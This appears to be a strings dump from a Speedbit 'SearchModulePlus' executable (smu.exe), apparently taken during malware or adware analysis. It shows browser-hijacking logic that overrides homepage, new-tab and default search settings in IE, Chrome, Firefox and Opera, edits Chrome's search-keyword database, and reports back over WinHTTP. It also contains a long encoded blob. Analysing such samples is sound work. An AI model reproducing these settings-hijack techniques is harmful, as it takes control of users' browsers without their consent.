[Explorer::BrowserSettings::SetTabbedBrowsingKeyValues]

[Explorer::BrowserSettings::SetSearchScopeKeyValues]

[Explorer::BrowserSettings::SetAboutURLsKeyValues]

Argument.SearchScopeToSearch:

Result.SearchScope:

[Explorer::BrowserSettings::DeleteKey]

Argument.Parent:

Argument.Subkey:

VirtualSpeedbitSearchScopeKey::EnsureKeyW

SuggestionsURLFallback

SuggestionsURL

FaviconURLFallback

TopResultURL

KERNELBASE.DLL

smu.exe_636:

.text

`.rdata

@.data

.rsrc

@.reloc

FTPj

E@PSSh

 1 23 456

Jx.SHx

.TxK%Yx

208.69.150.250

208.69.150.252

8.8.8.8

SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\

Catcher.ProcessId:

Catcher.Path:

Watcher.Filter:

2.1.9.476

smu.exe

Chrome

Report.xml

/Url:

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

3.7.2

SQLite format 3

CREATE TABLE sqlite_master(

sql text

CREATE TEMP TABLE sqlite_temp_master(

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYo

inflate 1.2.3 Copyright 1995-2005 Mark Adler

deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly

1.2.3

?456789:;<=

!"#$%&'()* ,-./0123

Report factory:

Update.xml

URLSet

Report

homeURL

suggestURL

newTabURL

ieSearchURL

chSearchURL

ffSearchURL

opSearchURL

chromeKeyword

[UpdateParser::Implementation::UpdateParser::ParseUrlSetSection]

vup.tmp

Argument.CheckResult:

Argument.IsRunning:

Delivery of report succeeded. TaskId:

Delivery of report failed.

&#xX;

</%s>

%s="%s"

%s='%s'

<!--%s-->

<![CDATA[%s]]>

version="%s"

encoding="%s"

standalone="%s"

SHDeleteKeyW

RegDeleteKeyExA

RegDeleteKeyExW

NtQueryKey

1.3.6.1.4.1.311.2.1.12

Snapshot.xml

GoogleChrome

MozillaFirefox

AboutTabsUrl

HomePageUrl

DefaultProviderKeyword

UrlsToRestoreOnStartup

StartupHomepageUrl

Chrome propagate flags:

Firefox propagate flags:

ParentKey:

GvrV5 fIBwR5G1CQDyLsic/pOLfRYKAGRyMxV8NxzSLudH5dYJ7ItKYE7rC1AC99X2kzxEChSNvkXetV0jCmjqUjmvO10UOWty3ApOQucR/hia9cu3H02a 5R CG5qhR8Y/uzTzzCr4GfPZ8D8t88yUqyCjdTSd8VRzWUuml0XIRmAC3mIaIBnS0qtpU54eeMa P511PX57TteCBWpQr UysHS8QouOBFyhBBaanipF1PUZ8zItL9IeCtaFExJDKcxi7FU7dmU7ctk7EMZZR3AC3j7jgcRnxrBRdeCW5PDYDKjcHmxPGAZm ePsRg6dCH9XvAsXiSqWsGTuCaJydkQ6BC6sdjbBYCQUNu0nP10JlSn5NzpucbmEgVB1WLSsSDe9vYbtKTOOJRR/CGu7qSqmZ1YxAdjnPMshzg FPfycjHdyERU/SZHvERWXU9WjRnocOXQbT0XOzcBQYfdCa3hiBDgamllsamooTTof6lK6Zb2EYpLiqRQU8WOQCSQu3D2YDP5v9J1Ah7R5gFH4pWrujpklOckba/Bhit29bHcRVAi6mCX5DamNCUq4tY5YMLWVOyVlPLgnZ2 AoHHhCVzsJqNqYZAEseYuauz5gxxhiozc82QCxEJsH2wDGV4Fnf8fmimJyQybsVBebTkkGhRnXfu0YEB4r2oBX3lttd09zG gE2dSUZsHBBBRwvxpM1HoEdvDeLKIaszMpTdRi5i9Rjlxfi9Gpe0mMgvRgepguez9/DfrgUpCVpjnmdNa5TuEirTy3 3mUWdojeY6y8tNBJLsyaj2cmjca3wiE/pLENTnow dbju2fmW9Odso8GLznFwJ6v7o aa2XPOVqX1qryZzbVRaYkdUtOZwrz3FBq1reAfrk12qBENZPPGH8qFcC1Xta09MnkMdxGwD1VeVH6y1RoVkpTPp8mumzKWoXv9DMFPLowiUNgpG22Ss2Vl3szBKCiwYupVQT1GMO/8/psE5WgwQjj9GkHyf3qsI7DSk3d1tp6LFKIdpFPw1fKx72Xwkee0n1T14ksSGewLuCI5WBuOqSexXFXKxmwFhXlCqivfRWSmIJP3ILQrfZbdILbXlwYfOJaoFIMMzCvlMq1hNa/26crmnuBXd8PAHYi5oF Ezzi28v/GmzOTan5Inj1p29ta/WyOajmdLkVPj/Ff/85EnaiNPV62/inI0Y G cikLBu94xgMNywTIn0iSo0A2A5zcNR0/W3DEqGCgbVHqqqN7oxy08Qx5h2gnrOB oSz4TfhJ72enIju7sYLTxMA7kHQzi1uY89QwqJ0lVbA0qUWOVGk3mHyuDH6s6ZsaVE21RT7iGvRc QmQG7X0EwDW3iK5YkiyDUwVzhYEGWfcbv2oR3qOQQDzTqwWYUeFmo0zKzQ86B08jN52EcuOE/ZCkLYCStfmrxhGiipXWbEWtFa973DaRy3KrobC50pz6S4AQ Xu9RlrutYMXGmRg/8hI08I4xW5uWRoMqVCLBcPq478k/Ez1Iuvw3JZBa5n3BHwmUosLcnRRpHWRptiZlKMNviUquLgwrIMhacWmDWX6DGjZz72knZzg3qzYwKatnnRjfEtXRrxXq5dKWE8P/XvlVCstT/qYqNm964Oc46C0p/j6M59qVRvkUnAZuZKVVXVc04fSy4FjvJzrD5LfXxpYA7lBFQ60fZYVir 54eC83A5L9BfivvGlwewWfWS5racrcSmF5nYMxn3f8EjwkuZK91BRZlAPdRAg1gfb2ohlntdntu/8x6g1Fph870zNk13u7LFWihV1csZZqZaKcf8uHi wLKouWpmT1vhCNR07YaH6glQvRnt556rVJvZWmKsVI D11NhFxQLUCKde TCvcZ9s8s2wVPTRW5ahtdYOUnZTFvHHm6WxjtFCc nNYa9LXYdoHnqQQbbKdnkYE3sY0r1cUZAZcLNGx7JjJlAz wLhxfvJ5Se6MsCoFx4tMQppa5N4IrcPL90Nqa0IehVmEvHvCsO96nwiOiJpFF5Rng8RAqrvnP7fJBgG grlD9sfim7R2LOvb8LIeDb/HkDwIOy0Ypq2WpWoj2sTSzv4LQeLmJnKqL8dPxNApEeCe/on90DLRH/7K2BOfAj4xNnkG8Wurgv8Aq205ha0rLU9c3fMu9qrSi/Lbh E5HwYMA/tzBwF6ZXR99yS0gt mz6yNCN8w9wK3 0cO6uoanOjzCCxkuXpkyIU5hIi4/aW0TS2NlDFlvgPs37FyXA3rM0rHHeEds6 N2YImzYWB45i3GqILHKLBnTYfsLAUMKSLqWFcSqlD2EAOJbgUN2dhhIZd8JSqHyltvUyR8fGRbT8H1C6lFlFw6TCxTjkY7hSGOB6CqzEs33tkr55PJUiBsU lrpTQX7T29psodMnih9sC97Wb6zIFJyIfIoxaxbcC411rqyJV WlRazWlP9dmcgd2KEqEuh HIGycoc6a74vp4I1eVo4j1DXtAbXnHEj/Nzk4NsFusbI9x9r8yoJGsAjKACoQqPoqgY6Nh6OgOPbqO0KcFE6RykrPzFDk087OfMz9xiaFrZcW9VdEoOGStbeIbQ61UbyXpHDkUpxIwy4WM6Q9jKdPcTJ3aBz3FCcdefxnGRHHeQ/TqrwU4zZ7WYikjCOoz6MLXTYdCCnrllA//dUk4rwM1HWaGHEMhUdSy8hKAd5bLH9JrVLB06axRgBYkgEfMAtdk/nTZwNFANA3xxxsjmlKtAzYNMpGhR5Jt2gs wEJKr3LF4mYqDxTmRdmxZzTSVlyupVv4c9WZc 5yFM63XebcscL6A4Vnd3tBpJCwY7BQj/INn 6L4DYFeEPAk3u56A6Idj9m5n3G8ElGy2ioOO5NLlT2BbQaf ydP 9doEgUl5I8vsvV3drtRmh8NlZTBnor4rhMg/5817TDiQOHVX/6ICKz8QAQ1qXh7rzHRgxv7l4hHdXC4BGHwimaD0vYdupfNiXOzJcR9Zi2FrL85kXZm/pKyAcUuT4mzwjvKHO8APVYBS3WPir7VT2GFuHIUk1jJdNzKYgPjW22pzqdWXzPCSwjqDtq1qci7tqa/iOikTtCsTOpe AtNDxBDyzbGRaGFRyDRmXf33o2wcd//5IkfU7zQDa8WdYYUqsJynEUW42wWLV2nfjyqvreKblZDfYXn7THCHpV FJqIA6QA3pVD/Iu4KCRWdwZhmGMf5115QF0A6wrHoiZr/C/c/ZzCzFd9AGd0/X/RXx5kAb/zSif FfHcxHpQ1pq956dBZ1KjZrY9PyxZF/uA8rHRCmaSGD4KhAwxA/T36fiLBJIvl YXdITmqH9g nng7f45Zi7UUvzZxHqetki8rZ VsWB0xM9f7cSEmyvDEqfhNKYT P/d8P9NRwv9pUx8RxruqBWYeyfeSKjB j97YTQCVG7lhvWt9SPacgGMHYQuR8YiGg3n/fKOacQ7XY7aXdMHYubFWgoTODW1TvMnTvo9KyKdcPRIZQLlODCSK2cA1/R AIojRwIFEU3gXLsC9CzL9TEeGdDnmnpTjRR/oc4fnDwiFdwh1sts7dbUU/MKxC0vIxSqTJ Bm5RJuCOUcCIOEALJ suBTJvj4EmrcgctR6ryJKkGlDzGLrLWgyK0pY776i MXQ6AA3wbM3ZQi75onR2vwCjgg8UQv5DMcP6HUM17MXCEHdbIEUvhJAKDZ6LGKfkP96HQrEgqjjsj97SZh YcQTzaR0M7JY3K3RwE/Oqv8BkWJMrOL1Mnhg vKtsNcwhtpUsBwrBgu3JrXbI/x0dho12ZuysjpUNiI7l8TVGCz00XXU0TNrucXvRe0z35rEpiTe9S/xdMqSDXmdGPz0VAHnfSf7GAckWfA3cfc6 fK3empP1a92e LLSpLJ eMrocYgVIvvo3sTpDaXWjQTa02srQEfZ9IFEOoEy3hYk1SzsXYanCd2UpHfsIHUn7A6Q5RL6kWAZXZjwXvcyDAd/iE/QmFFsENOkaEHNg5OVQeNkq6yEZdfdzPkkTSoD4ztUHEJpeNg66Z9bb085oS J3S42RvycdQGnk5Oi5IEzP24pIdF j3sKq17UXVbyMFHV8lOjWSlh1Y0Kq937bvGCBsnRwVwsXGaLrE0r4tLCj m5AR2mFP4JZKENROWGtv3BprlrMyW6uvd5XSKuyvDiHUpXC6X9vrBPdjhmY u1Ix3RLWWPyTlPNW9REKmk L6jtTqOdXQBBY6llXsDP GxJn/t1uTRSFktjf19T8K50owKGTnlhpUoqBt9WVKYR6YyGit8Mk9OX/kVR75EdE/t/VVSU/iQ4d3nFk75apgn3VoMIbDYB0MU7nPdwWV4Bw3vs2RpHTpOtd1ALNwE2rqG4GkKoTSlO7r7pf/7JUPLCEJ3MTmW ertKdGAF44MJoB5oJUC7cRpKE1GGYau4eKBe29fIMqabrVr6QSkkptljw8q6a9b0s51CNzKlcCEcnJ7cb8LzsVCoGFhsnLlYPtWEiZHnck3lMYWn 3dXBSbWlR5w4LH5uACO4/rhbVUD4ucX8Q3I xuwLg6D9pwjadqdcdeihP/dYMvbQkdRk/tNAX0NaFWMR/HAAIfPoqp/1rr1gRVssVKEiGD5sEAwe6oTJDXp53arWV3D/D5vn5IujBQ 2rnEYYUHXiy8l1JERR4rjNA7DT12jpOMT0jMd3iVIUBUj1mzjGZXIzrf1f/a31pbSCu 0xzo QvEihKjVfvV3OARI6o/U01YFNMB9PVBsYErGfiDd63JVmt3N8qLiFu9vjgbuR8v1Rqn6xhFt/268gxSnx6tR6RFkFakyk6xOIaoJqswSm7afKhThe55zMkJ1PXHaus/uKqhRKSx4PeLqR FvkdLVc1JiARy7RTdtBf4Bb2EFW11 XM3gU54DShNFXlldANcdZN6m/SO8vvJk2D45MvLWXyNVpppvdKfZ8gxSFna86neYQQ5MDbA2ybUl7PMmpMhipbx4u11sXUrkPb1krAEmlZe8b0NidLcTj9VOBgLD1OGyOnG 6iwNfShAh8UxAiZdQsOW7WkEAhvQWcu8F7zEZv1/RgOnyZj8h3NoufhlpqLWpBDf1Yn2TzN3mCKZZVtLWxoUGYN5hKFOHNw wFzSF/NcvveWIPceTitVXSx5V6KEMOmO9a8dbLLGj7wxi CD8aPNkL axxoWufJlAgNxC5vXoEVAtplK0CHRgJ/wFPHmREGEF7NKP9A1ATHTHzs97I04evT1dSc49oXK9XKbkx4nNsdwgeSdyWVKCABqAz9kVRVIom17pjwW8hc2JMJMhfEYUhDTenPgRu39cVRdPbHRBv9RULbqFimTLA6Ty1z2vN d RyOelC1Br/KCR1gs3 82Cpw9ANMYOUJSuSRxU/0yUKmboVum8icoM 1NpWi o wNKF/mtSGBg2O7QHI1qiCaEFr4JJ1dCTCibfvDUMgTIY4O6BS09dnfU66wIflATHfn3Vmz2O50icTeJCWKS1jbawYcRi18oLSBwmpPDXEo2PN7yZL9HUZF1QouUtVmHVEdUE4rQByTqa1MVsX86qDqtUnory9jONYV/vH7d4ez2KHSdPTt9xp3DAUH6A6dfyDIuV/9p42DDcXnW76lM3U/CsGM D9wFWiE46fRg5YU7GaujJWF04ZND7q gtbYPtbQ5 c5GicyYhXm7 JEE0t2 umb1A3XkLpWHPgOskn6nDRqT8pogSUQIwAhh71cUWkOGDMbcf JXOSMxXP9kIlF0Hl83ZsuwOnCxDcq7fa7o4mw/XZQgWJ7s4hA8s3/oev6/GtZX1KRw0qxgWbFSByNpU9rJc7akt9ZTVy19DUC2bVf/S7 mDmdLTLXknZuoeYWL /Yu/KMHimnmPc3VbRijG9yMq346J4Uzg qdOxn2P9sq2/IGUhNgRHnYhWUtJpyCaS7J8aQXHlRip23vRRFZdpWvqMNS9BWHDk1ISh5GUkediSGfX6oTEL2qol6OQQa4sXuy2Ei75O6Mdxd8rEdObV9Nr8FAW0IXJI93aPpDKjCx12PbNKFWnWXhtfxNKNQd9uTCY=

2, 1, 9, 476

Envelop.xml

Configuration.xml

UrlSet

Opera

StartPageUrl

AboutTabUrl

SearchScopeUrl

SearchScopeIconUrl

SearchScopeSuggestUrl

DefaultProviderSearchUrl

DefaultProviderIconUrl

DefaultProviderSuggestUrl

SearchPluginUrl

SearchPluginSuggestionUrl

TabPageUrl

SearchEngineFaviconUrl

SearchEngineSuggestionUrl

SearchEngineSearchUrl

SearchEngineKeyword

System.xml

Reset-2.1.0.7

UpdateUrl

ReportUrl

ReportDlls

User.xml

urls

SELECT * FROM urls

ERROR: %s

WebData path:

Argument.GeneralConfig:

Argument.Snapshot:

Argument.Flags:

suggest_url

originating_url

favicon_url

keyword

keyword LIKE '

keywords

WHERE key = 'Default Search Provider ID'

key = 'Default Search Provider ID'

DELETE from keywords WHERE id =

search_url

icon_url

startup_urls

urls_to_restore_on_startup

chrome_url_overrides

template_url_data

www-searching.com

image_url_post_params

instant_url

instant_url_post_params

new_tab_url

search_terms_replacement_key

search_url_post_params

suggestions_url

suggestions_url_post_params

chrome_settings_overrides

session.startup_urls

web_url

search_icon.png

select count(*) from sqlite_master where type = 'table' and name = '

%d-%m-%Y %H:%M, %a

large file support is disabled

SQL logic error or missing database

foreign_keys

sqlite_compileoption_get

sqlite_compileoption_used

sqlite_source_id

sqlite_version

sqlite_attach

sqlite_detach

sqlite_stat1

sqlite_rename_parent

sqlite_rename_trigger

sqlite_rename_table

RowKey

SQLITE_

d-d-d d:d:d

d:d:d

d-d-d

failed to allocate %u bytes of memory

failed memory resize %u to %u bytes

922337203685477580

API call with %s database connection pointer

%s-shm

%s\etilqs_

OsError 0x%x (%u)

Recovered %d frames from WAL file %s

invalid page number %d

2nd reference to page %d

Failed to read ptrmap key=%d

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

%d of %d pages missing from overflow list starting at %d

failed to get page %d

freelist leaf count too big on page %d

Page %d:

unable to get the page. error code=%d

btreeInitPage() returns error code %d

On tree page %d cell %d:

On page %d at right child:

Corruption detected in cell %d on page %d

Multiple uses for byte %d of page %d

Fragmentation of %d bytes reported as %d on page %d

Page %d is never used

Pointer map page %d is referenced

Outstanding page count goes from %d to %d during this analysis

keyinfo(%d

%s(%d)

%s-mjX

foreign key constraint failed

unable to use function %s in the requested context

bind on a busy prepared statement: [%s]

zeroblob(%d)

abort at %d in [%s]: %s

constraint failed at %d in [%s]

cannot open savepoint - SQL statements in progress

no such savepoint: %s

cannot %s savepoint - SQL statements in progress

cannot rollback transaction - SQL statements in progress

cannot commit transaction - SQL statements in progress

sqlite_temp_master

sqlite_master

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

cannot change %s wal mode from within a transaction

database table is locked: %s

statement aborts at %d: [%s] %s

cannot open virtual table: %s

cannot open view: %s

no such column: "%s"

foreign key

indexed

cannot open %s column for writing

cannot open value of type %s

misuse of aliased aggregate %s

%s: %s.%s.%s

%s: %s.%s

%s: %s

not authorized to use function: %s

%r %s BY term out of range - should be between 1 and %d

too many terms in %s BY clause

Expression tree is too large (maximum depth %d)

variable number must be between ?1 and ?%d

too many SQL variables

too many columns in %s

misuse of aggregate: %s()

%.*s"%w"%s

%s%.*s"%w"

%s OR name=%Q

there is already another table or index with this name: %s

sqlite_

table %s may not be altered

view %s may not be altered

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

sqlite_sequence

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

Cannot add a PRIMARY KEY column

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

sqlite_altertab_%s

CREATE TABLE %Q.%s(%s)

DELETE FROM %Q.%s WHERE tbl=%Q

SELECT idx, stat FROM %Q.sqlite_stat1

invalid name: "%s"

too many attached databases - max %d

database %s is already in use

unable to open database: %s

no such database: %s

cannot detach database %s

database %s is locked

%s %T cannot reference objects in database %s

access to %s.%s.%s is prohibited

access to %s.%s is prohibited

object name reserved for internal use: %s

there is already an index named %s

too many columns on %s

duplicate column name: %s

default value of column [%s] is not constant

table "%s" has more than one primary key

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

no such collation sequence: %s

CREATE %s %.*s

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

CREATE TABLE %Q.sqlite_sequence(name,seq)

view %s is circularly defined

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

table %s may not be dropped

use DROP TABLE to delete table %s

use DROP VIEW to delete view %s

DELETE FROM %s.sqlite_sequence WHERE name=%Q

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q

foreign key on %s should reference only one column of table %T

number of columns in foreign key does not match the number of columns in the referenced table

unknown column "%s" in foreign key definition

indexed columns are not unique

table %s may not be indexed

views may not be indexed

virtual tables may not be indexed

there is already a table named %s

index %s already exists

sqlite_autoindex_%s_%d

table %s has no column named %s

CREATE%s INDEX %.*s

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

no such index: %S

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

DELETE FROM %Q.%s WHERE name=%Q

DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q

a JOIN clause is required before %s

unable to identify the object to be reindexed

table %s may not be modified

cannot modify %s because it is a view

foreign key mismatch

table %S has %d columns but %d values were supplied

%d values for %d columns

table %S has no column named %s

%s.%s may not be NULL

PRIMARY KEY must be unique

sqlite3_extension_init

unable to open shared library [%s]

no entry point [%s] in shared library [%s]

error during initialization: %s

automatic extension loading failed: %s

foreign_key_list

*** in database %s ***

unsupported encoding: %s

malformed database schema (%s)

%s - %s

unsupported file format

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

database schema is locked: %s

unknown or unsupported join type: %T %T%s%T

RIGHT and FULL OUTER JOINs are not currently supported

a NATURAL join may not have an ON or USING clause

cannot have both ON and USING clauses in the same join

cannot join using column %s - column not present in both tables

%s.%s

%s:%d

ORDER BY clause should come after %s not before

LIMIT clause should come after %s not before

SELECTs to the left and right of %s do not have the same number of result columns

no such index: %s

sqlite_subquery_%p_

no such table: %s

sqlite3_get_table() called with two or more incompatible queries

cannot create %s trigger on view: %S

cannot create INSTEAD OF trigger on table: %S

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

no such trigger: %S

-- TRIGGER %s

no such column: %s

PRAGMA vacuum_db.synchronous=OFF

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

vtable constructor failed: %s

vtable constructor did not declare schema: %s

no such module: %s

table %s: xBestIndex returned an invalid plan

at most %d tables in a join

cannot use index: %s

TABLE %s

%s AS %s

%s WITH AUTOMATIC INDEX

%s WITH INDEX %s

%s VIA MULTI-INDEX UNION

%s USING PRIMARY KEY

%s VIRTUAL TABLE INDEX %d:%s

%s ORDER BY

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

unable to close due to unfinished backup operation

unknown database: %s

no such vfs: %s

database corruption at line %d of [%.10s]

misuse at line %d of [%.10s]

cannot open file at line %d of [%.10s]

Argument.StartPage:

Argument.Autosearch:

Argument.NewTabPageShow:

Argument.SearchScopeId:

Argument.Tabs:

C:\BUILDS\Build_Watchman\Ver2\Speedbit.Watchman\Bin\SearchModulePlus_SearchModulePlus\Win32\WinMV\Release\smu.pdb

SHELL32.dll

SHLWAPI.dll

KERNEL32.dll

USER32.dll

RegOpenKeyExA

RegCloseKey

RegOpenKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

MSVCP90.dll

MSVCR90.dll

_amsg_exit

_crt_debugger_hook

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpConnect

WinHttpCloseHandle

WinHttpQueryDataAvailable

WinHttpOpen

WinHttpOpenRequest

WinHttpReadData

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

GetExtendedTcpTable

IPHLPAPI.DLL

WS2_32.dll

PSAPI.DLL

WTSAPI32.dll

Secur32.dll

CryptMsgClose

CertGetNameStringW

CertFreeCertificateContext

CertFindCertificateInStore

CertCloseStore

CryptMsgGetParam

CRYPT32.dll

USERENV.dll

CreatePipe

ConnectNamedPipe

CreateNamedPipeW

GetNamedPipeInfo

DisconnectNamedPipe

GetProcessHeap

RegCreateKeyW

RegCreateKeyExW

RegOpenKeyW

RegQueryInfoKeyW

RegDeleteKeyA

RegDeleteKeyW

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyExA